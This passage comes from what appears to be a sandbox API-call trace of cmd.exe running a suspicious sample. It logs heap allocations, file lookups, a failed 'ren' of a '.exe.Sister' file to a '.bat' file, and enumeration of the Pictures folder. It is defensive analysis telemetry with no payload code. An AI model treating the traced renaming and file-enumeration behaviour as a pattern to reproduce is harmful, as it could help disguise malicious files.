MemoryPointer=0x21ed93268b0) returned 0x30 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93268f0 [0293.771] malloc (_Size=0x1ff9c) returned 0x21ed98ff980 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937bf30 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937b0f0 [0293.771] ??_V@YAXPEAX@Z () returned 0x1 [0293.771] malloc (_Size=0x1ff9c) returned 0x21ed98ff980 [0293.771] GetProcessHeap () returned 0x21ed8c70000 [0293.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c830 [0293.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed98ff980, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.772] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7a20 [0293.772] FindClose (in: hFindFile=0x21ed8cc7a20 | out: hFindFile=0x21ed8cc7a20) returned 1 [0293.772] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7a20 [0293.772] FindClose (in: hFindFile=0x21ed8cc7a20 | out: hFindFile=0x21ed8cc7a20) returned 1 [0293.772] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7a80 [0293.773] FindClose (in: hFindFile=0x21ed8cc7a80 | out: hFindFile=0x21ed8cc7a80) returned 1 [0293.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.773] malloc (_Size=0x1ff9c) returned 0x21ed991f930 [0293.773] ??_V@YAXPEAX@Z () returned 0x21ed991f930 [0293.773] GetProcessHeap () returned 0x21ed8c70000 [0293.773] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66eb0 [0293.773] ??_V@YAXPEAX@Z () returned 0x1 [0293.773] ??_V@YAXPEAX@Z () returned 0x1 [0293.773] GetProcessHeap () returned 0x21ed8c70000 [0293.773] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93268f0, Size=0x490) returned 0x21ed93268f0 [0293.773] GetProcessHeap () returned 0x21ed8c70000 [0293.773] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93268f0) returned 0x490 [0293.773] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.774] GetFileType (hFile=0x50) returned 0x2 [0293.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.774] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.775] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.781] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.781] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.782] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.782] GetFileType (hFile=0x50) returned 0x2 [0293.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.782] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.782] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.783] GetFileType (hFile=0x50) returned 0x2 [0293.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.783] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.783] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93268c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93268c0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.784] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.784] GetFileType (hFile=0x50) returned 0x2 [0293.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.784] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.784] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.792] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.793] GetFileType (hFile=0x50) returned 0x2 [0293.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.793] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.793] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.799] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.800] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.801] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.801] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.801] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.801] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.801] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.801] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.801] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.801] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.801] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.801] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.801] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.801] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.801] ??_V@YAXPEAX@Z () returned 0x1 [0293.801] GetProcessHeap () returned 0x21ed8c70000 [0293.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0293.801] GetProcessHeap () returned 0x21ed8c70000 [0293.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d56ba0 [0293.801] GetProcessHeap () returned 0x21ed8c70000 [0293.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56ba0) returned 0x130 [0293.802] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.802] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.802] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.802] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.802] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed98ff980, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.803] ??_V@YAXPEAX@Z () returned 0x1 [0293.803] GetProcessHeap () returned 0x21ed8c70000 [0293.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d567e0 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed8d56420 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56420) returned 0x130 [0293.804] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.804] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8320 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9302bb0 [0293.804] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.804] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.804] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.804] GetLastError () returned 0x2 [0293.804] GetProcessHeap () returned 0x21ed8c70000 [0293.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9326d90 [0293.804] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9326da0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.804] SetErrorMode (uMode=0x0) returned 0x0 [0293.804] SetErrorMode (uMode=0x1) returned 0x0 [0293.805] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed98ff980, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.805] SetErrorMode (uMode=0x0) returned 0x1 [0293.805] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.805] GetProcessHeap () returned 0x21ed8c70000 [0293.805] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9304dd0 [0293.805] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.805] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.805] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.805] GetLastError () returned 0x2 [0293.805] ??_V@YAXPEAX@Z () returned 0x1 [0293.805] malloc (_Size=0xffce) returned 0x21ed98ff980 [0293.805] ??_V@YAXPEAX@Z () returned 0x21ed98ff980 [0293.805] malloc (_Size=0xffce) returned 0x21ed990f960 [0293.805] ??_V@YAXPEAX@Z () returned 0x21ed990f960 [0293.805] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.805] GetLastError () returned 0x2 [0293.805] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.805] GetFileType (hFile=0x54) returned 0x2 [0293.805] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.805] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.806] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.806] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.806] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.806] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.806] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.811] longjmp () [0293.812] ??_V@YAXPEAX@Z () returned 0x1 [0293.812] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="RPjY4uqao.bmp", cAlternateFileName="")) returned 1 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x1a4) returned 0x21ed8c72790 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x1a4 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9336d80 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9336d80, Size=0x30) returned 0x21ed9336d80 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9336d80) returned 0x30 [0293.812] GetProcessHeap () returned 0x21ed8c70000 [0293.812] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9336dc0 [0293.813] malloc (_Size=0x1ff9c) returned 0x21ed991f940 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8650 [0293.813] ??_V@YAXPEAX@Z () returned 0x1 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9336dc0, Size=0x150) returned 0x21ed9336dc0 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9336dc0) returned 0x150 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9336f20 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9336f20, Size=0x290) returned 0x21ed9336f20 [0293.813] GetProcessHeap () returned 0x21ed8c70000 [0293.813] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9336f20) returned 0x290 [0293.814] GetProcessHeap () returned 0x21ed8c70000 [0293.814] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93371c0 [0293.814] GetProcessHeap () returned 0x21ed8c70000 [0293.814] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93371c0, Size=0x30) returned 0x21ed93371c0 [0293.814] GetProcessHeap () returned 0x21ed8c70000 [0293.814] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93371c0) returned 0x30 [0293.814] GetProcessHeap () returned 0x21ed8c70000 [0293.814] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9337200 [0293.814] malloc (_Size=0x1ff9c) returned 0x21ed991f940 [0293.814] GetProcessHeap () returned 0x21ed8c70000 [0293.814] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8b90 [0293.814] ??_V@YAXPEAX@Z () returned 0x1 [0293.814] malloc (_Size=0x1ff9c) returned 0x21ed991f940 [0293.814] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7a20 [0293.814] FindClose (in: hFindFile=0x21ed8cc7a20 | out: hFindFile=0x21ed8cc7a20) returned 1 [0293.814] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc81a0 [0293.815] FindClose (in: hFindFile=0x21ed8cc81a0 | out: hFindFile=0x21ed8cc81a0) returned 1 [0293.815] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9b54e20, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9b54e20, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc7600 [0293.815] FindClose (in: hFindFile=0x21ed8cc7600 | out: hFindFile=0x21ed8cc7600) returned 1 [0293.815] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\RPjY4uqao.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0x4, dwReserved1=0x7, cFileName="RPjY4uqao.bmp", cAlternateFileName="RPJY4U~1.BMP")) returned 0x21ed8cc7780 [0293.815] FindClose (in: hFindFile=0x21ed8cc7780 | out: hFindFile=0x21ed8cc7780) returned 1 [0293.815] _wcsnicmp (_String1="RPJY4U~1.BMP", _String2="RPjY4uqao.bmp", _MaxCount=0xd) returned 13 [0293.815] malloc (_Size=0x1ff9c) returned 0x21ed993f8f0 [0293.816] ??_V@YAXPEAX@Z () returned 0x21ed993f8f0 [0293.817] GetProcessHeap () returned 0x21ed8c70000 [0293.817] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45b30 [0293.817] ??_V@YAXPEAX@Z () returned 0x1 [0293.817] ??_V@YAXPEAX@Z () returned 0x1 [0293.817] GetProcessHeap () returned 0x21ed8c70000 [0293.817] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9337200, Size=0x150) returned 0x21ed9337200 [0293.817] GetProcessHeap () returned 0x21ed8c70000 [0293.817] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9337200) returned 0x150 [0293.817] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.817] GetFileType (hFile=0x50) returned 0x2 [0293.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.817] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.819] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.827] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.827] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.827] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.827] GetFileType (hFile=0x50) returned 0x2 [0293.827] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.827] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.828] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.828] GetFileType (hFile=0x50) returned 0x2 [0293.829] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.829] GetConsoleMode (in: 